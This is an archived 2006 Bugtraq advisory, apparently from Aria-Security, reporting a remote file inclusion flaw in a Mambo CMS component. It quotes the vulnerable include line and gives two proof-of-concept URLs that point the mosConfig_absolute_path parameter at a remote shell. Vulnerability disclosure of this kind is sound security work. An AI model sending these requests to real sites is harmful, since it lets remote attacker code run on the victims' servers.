| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20060820010123.29893.qmail@securityfocus.com>
Date: 20 Aug 2006 01:01:23 -0000
From: Outlaw@...a-security.net
To: bugtraq@...urityfocus.com
Subject: Mambo Component - Display MOSBot Manager Remote File Inclusion Vuln
###########################################################################################
# Aria-Security.net Advisory #
# Discovered by: O.U.T.L.A.W # # < www.Aria-security.net > #
# Gr33t to: A.U.R.A & Hessam-X & Cl0wn & DrtRp #
# #
###########################################################################################
#Software: Mambo Component - Display MOSBot Manager
#Attack method: Remote File Inclusion
#Source:
#include_once( "".$mosConfig_absolute_path."/administrator/components/". $component_directory ."/toolbar.".
************************************************************************************
#Proof of Concept:
#http://www.site.com/com_admin-copy_module/toolbar.admin-copy_module.php?mosConfig_absolute_path=shell
#http://www.site.com/com_admin-copy_module/admin.admin-copy_module.php?mosConfig_absolute_path=shell
#----------------------------------------------------------
#
#
#Contact : Outlaw@...a-security.net